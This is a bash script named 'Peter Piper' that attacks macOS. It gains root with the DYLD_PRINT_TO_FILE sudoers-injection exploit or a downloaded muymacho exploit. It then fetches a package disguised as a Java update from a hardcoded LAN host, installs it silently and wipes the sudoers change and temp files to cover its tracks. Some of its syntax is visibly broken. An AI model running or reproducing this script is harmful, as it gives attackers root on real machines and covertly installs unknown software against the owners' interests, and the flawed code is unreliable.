#!/bin/bash

# Peter Piper
# Exploit the machine, install on the machine, then cleanup the machine

# Created by:
# Patrick Hart & Zachery Rayburn

echo;echo
echo -e '\033[1m ██▓███  ▓█████▄▄▄█████▓▓█████  ██▀███      ██▓███   ██▓ ██▓███  ▓█████  ██▀███  \033[0m'
echo -e '\033[1m▓██░  ██▒▓█   ▀▓  ██▒ ▓▒▓█   ▀ ▓██ ▒ ██▒   ▓██░  ██▒▓██▒▓██░  ██▒▓█   ▀ ▓██ ▒ ██▒\033[0m'
echo -e '\033[1m▓██░ ██▓▒▒███  ▒ ▓██░ ▒░▒███   ▓██ ░▄█ ▒   ▓██░ ██▓▒▒██▒▓██░ ██▓▒▒███   ▓██ ░▄█ ▒\033[0m'
echo -e '\033[1m▒██▄█▓▒ ▒▒▓█  ▄░ ▓██▓ ░ ▒▓█  ▄ ▒██▀▀█▄     ▒██▄█▓▒ ▒░██░▒██▄█▓▒ ▒▒▓█  ▄ ▒██▀▀█▄  \033[0m'
echo -e '\033[1m▒██▒ ░  ░░▒████▒ ▒██▒ ░ ░▒████▒░██▓ ▒██▒   ▒██▒ ░  ░░██░▒██▒ ░  ░░▒████▒░██▓ ▒██▒\033[0m'
echo -e '\033[1m▒▓▒░ ░  ░░░ ▒░ ░ ▒ ░░   ░░ ▒░ ░░ ▒▓ ░▒▓░   ▒▓▒░ ░  ░░▓  ▒▓▒░ ░  ░░░ ▒░ ░░ ▒▓ ░▒▓░\033[0m'
echo -e '\033[1m░▒ ░      ░ ░  ░   ░     ░ ░  ░  ░▒ ░ ▒░   ░▒ ░      ▒ ░░▒ ░      ░ ░  ░  ░▒ ░ ▒░\033[0m'
echo -e '\033[1m░░          ░    ░         ░     ░░   ░    ░░        ▒ ░░░          ░     ░░   ░ \033[0m'
echo -e '\033[1m            ░  ░           ░  ░   ░                  ░              ░  ░   ░     \033[0m'
echo -e '\033[1m                                                                                 \033[0m'
echo 'Created by:'
echo 'Patrick Hart & Zachery Rayburn'
echo;echo

function KeepSafe {
echo -e '\033[1mExploiting machine...\033[0m'
echo
#--- DEFINE VARIABLES ---#
randomTMP=~/tmp$$/
serverAddress=192.168.2.175:5980/Java_8_Update_60.pkg
curledFile=/tmp$$/Java_8_Update_60.pkg

#--- MAKE A TEMPORARY DIRECTORY WITH UNIQUE PID ---#
    sudo mkdir -v $randomTMP

    echo;echo
#--- PREFETCH MACHO ---#
curl https://raw.githubusercontent.com/luismiras/muymacho/master/muymacho.py > /$randomTMP/macho.py
#--- EPLOIT THE MACHINE ---#
function rocket { echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo bash <<'BASHINJECT' }
function macho {
cd /$randomTMP
python macho.py /$randomTMP }
echo "rocket or macho?"
read answer
  if [ $answer = rocket];
    then
      rocket
    else
  fi

  if [ $answer = macho ];
    then
      macho
    else
  fi

#--- CHECK FOR ROOT ---#
  if [[ $EUID -ne 0 ]]
  then
    echo -e "\033[1mFailed! No root!\033[0m"
    exit 1
  else
  fi
#--- DOWNLOAD THE PACKAGE ---#
    echo -e "\033[1mcURLing Java_8_Update_60.pkg...\033[0m"
    sudo curl $serverAddress -o $curledFile
    echo -e "\033[1mDone.\033[0m"

    echo;echo

#--- INSTALL THE PACKAGE ---#
    echo -e "\033[1mInstalling packages...\033[0m"
    sudo installer -verbose -pkg $curledFile -target LocalSystem
    echo -e "\033[1mDone.\033[0m"

    echo;echo

    echo -e "\033[1mCleaning up exploited machine...\033[0m"

    echo;echo

#--- REMOVE THE LINE GRANTING ROOT ACCESS ---#
    sudo sed -i "" "/NOPASSWD:ALL/d" /etc/sudoers
#--- REMOVE TEMPORARY DIRECTORY ---#
    echo -e "\033[1mRemoving temporary files and directories...\033[0m"
    echo -e "\033[1mRemoved: \033[0m"
    rm -rfv /tmp$$

    echo;echo

    echo -e "\033[1mCompleted successfully.\033[0m"
  fi
  exit 0
BASHINJECT
}
#--- MAKE SURE WE SUCCEED ---#
trap KeepSafe EXIT
